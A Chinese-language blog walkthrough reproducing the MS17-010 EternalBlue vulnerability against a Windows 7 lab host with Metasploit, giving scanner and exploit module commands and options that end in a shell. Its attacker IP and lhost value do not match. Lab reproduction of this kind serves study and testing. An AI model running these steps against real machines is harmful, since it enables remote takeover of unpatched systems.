MS17-010漏洞复现
2024-08-31 06:21:09
攻击机:192.168.148.132 kali linux2018.2 x64
靶机:192.168.1.129 win7 x64
首先用msfconsole的smb模块扫描,看看是否有漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.1.129 (目标主机)
Host is likely VULNERABLE to MS17-010! - Windows 7 Professiona
表示这个主机存在这个漏洞
1 search ms17_010 搜索这个漏洞
2 use exploit/windows/smb/ms17_010_eternalblue
利用这个漏洞
3 show options
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.129 目标主机
rhost => 192.168.1.129
msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.132 攻击者主机
lhost => 192.168.1.132
msf exploit(windows/smb/ms17_010_eternalblue) > set lport 8888 监听端口 (这个可以随意,但要大于2000,个人认为)
run 开始攻击 这个表示拿shell成功了
最新文章
- 【dubbo】zookeeper搭建
- Linux下NDK编译FFMPEG包含neon参数
- github打不开
- 使用 PSD Validator 在线校验 PSD 文件的质量
- vs2012中怎样设为起始页,怎样取消
- 微信开发(03)之新建按钮时报错 errcode 40054
- PHP获得两个绝对路径的相对路径
- 【转】WF事件驱动
- spring mvc json 返回乱码问题解决(vestion:3.x.x)
- MAC安裝《Genymotion Android模擬器》大玩Android APP (神魔之塔)
- UVa 10176 - Ocean Deep ! - Make it shallow !!
- requireJS基础使用
- 【题解】Luogu P3217 [HNOI2011]数矩形
- SCU 4439 Vertex Cover(二分图最小覆盖点)题解
- HanLP极致简繁转换详细讲解
- Fiddler 手机无法上网问题
- nginx+lvs+keepalived安装
- ssm框架中的乱码问题的解决
- Flask学习目录
- 去掉input框后边的叉号
热门文章
- 关于 mysql2 -v '0.3.21'(CentOS7.3)
- Hadoop 安全模式safemode
- 多个for循环嵌套会影响速度
- 在java中实现数据导入excel表格中
- Mysql查询创建和导入操作
- 58 字体反爬攻略 python3
- ltp-ddt nor qspi spi调试中需要修改的地方
- Prometheus监控学习笔记之Prometheus 2.0 告警规则介绍
- Ubuntu 无界面使用selenium chrome + headless
- linux编译链接找不到库文件的解决方法。